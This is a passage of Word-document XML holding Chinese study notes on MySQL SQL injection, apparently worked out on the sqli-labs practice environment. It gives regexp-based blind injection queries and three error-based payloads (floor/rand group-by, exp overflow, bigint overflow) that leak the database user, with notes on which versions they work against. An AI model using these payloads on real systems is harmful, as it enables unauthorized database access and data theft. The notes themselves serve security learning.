          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> regexp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'1q'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>`security`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>.users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6DF4B" w14:textId="36DAC99A" w:rsidR="00070E49" w:rsidRDefault="00070E49" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> regexp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'1q'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>`security`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">.users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30E2CA" w14:textId="3250B040" w:rsidR="00070E49" w:rsidRDefault="00070E49" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外如，可以用作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断是否恒真。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3629257B" w14:textId="1A998931" w:rsidR="00070E49" w:rsidRDefault="00070E49" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>I select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C71EF" w14:textId="638FB181" w:rsidR="00070E49" w:rsidRPr="00C808E9" w:rsidRDefault="00070E49" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>IIselect * from users where id=1 and 1=(user() regexp'^ri');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC36FA5" w14:textId="395761B6" w:rsidR="00002710" w:rsidRDefault="00C808E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="684C46B3" wp14:editId="6F15A8CE">
            <wp:extent cx="5274310" cy="2754630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1807020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2072" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2754630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="241380CB" w14:textId="77777777" w:rsidR="00002710" w:rsidRDefault="00002710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAD026A" w14:textId="77777777" w:rsidR="00002710" w:rsidRDefault="00002710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9744E7" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262F5EF0" w14:textId="73DB6B89" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc159779472"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="242A6F6F" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B01CAAC" w14:textId="66A1DD12" w:rsidR="0088001C" w:rsidRPr="0068280D" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个人认为，</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>比较和</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> like</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> regexp</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的盲注匹配类似，均为</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>码使用二分法推进，故三者可互相替换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8D7B0" w14:textId="77777777" w:rsidR="0088001C" w:rsidRPr="0068280D" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC3EA18" w14:textId="732D6E05" w:rsidR="0088001C" w:rsidRPr="0068280D" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8.0.12</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>无法使用如下报错盲注，而使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以正常使用报错盲注</w:t>
      </w:r>
      <w:r w:rsidR="002A13C0" w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，其</w:t>
      </w:r>
      <w:r w:rsidR="002A13C0" w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidR="002A13C0" w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r w:rsidR="002A13C0" w:rsidRPr="0068280D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5.5.44-0ubuntu0.14.04.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0068280D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA3A71" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A076569" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5472E153" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于报错的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B1AEC" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484AD8C" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.select exp(~(select * FROM(SELECT USER())a)) //double </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数值类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型超出范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61029738" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//Exp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为底的对数函数；版本在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.5.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及其以上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B70247F" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错文章：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/lcamry/articles/5509124.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5834FE37" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.select !(select * from (select user())x) -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是减号）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04097B45" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">//bigint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>超出范围；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">~0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逐位取反，很大的版本在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.5.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及其以上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAC022" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以参考文章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bigint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
